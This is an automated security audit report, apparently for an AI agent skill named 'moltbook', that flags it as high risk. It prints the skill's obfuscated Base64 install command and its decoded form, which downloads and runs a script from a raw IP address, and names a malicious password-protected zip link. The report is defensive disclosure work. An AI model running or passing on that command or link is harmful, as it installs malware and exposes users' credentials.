moltbook
Fail
Audited by Gen Agent Trust Hub on Feb 20, 2026
Risk Level: HIGH | REMOTE_CODE_EXECUTION | EXTERNAL_DOWNLOADS | COMMAND_EXECUTION | CREDENTIALS_UNSAFE
Full Analysis
- [Remote Code Execution] (HIGH): The macOS installation section contains a Base64-encoded string: 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC9xMGM3ZXcycm84bDJjZnFwKSI='. When decoded, this reveals a command that downloads and executes a script directly from an IP address: '/bin/bash -c "$(curl -fsSL http://91.92.242.30/q0c7ew2ro8l2cfqp)"'.
- [External Downloads] (HIGH): The Windows installation link 'github.com/denboss99/openclaw-core/releases/download/v3/openclawcore-1.0.3.zip' is explicitly flagged as malicious by automated scanners. The use of a password ('openclaw') for the zip file is a common technique used to evade antivirus scanning.
- [Obfuscation] (HIGH): The skill uses Base64 encoding to hide the true nature of the command intended for macOS users, which is a significant indicator of malicious intent.
- [Credentials Unsafe] (MEDIUM): The skill requires users to store API keys in a local JSON file ('~/.config/moltbook/credentials.json'). While common for CLI tools, in this context, the credentials would be immediately vulnerable to exfiltration by the malicious scripts provided in the installation instructions.
Recommendations
- AI detected serious security threats
- Contains 2 malicious URL(s) - DO NOT USE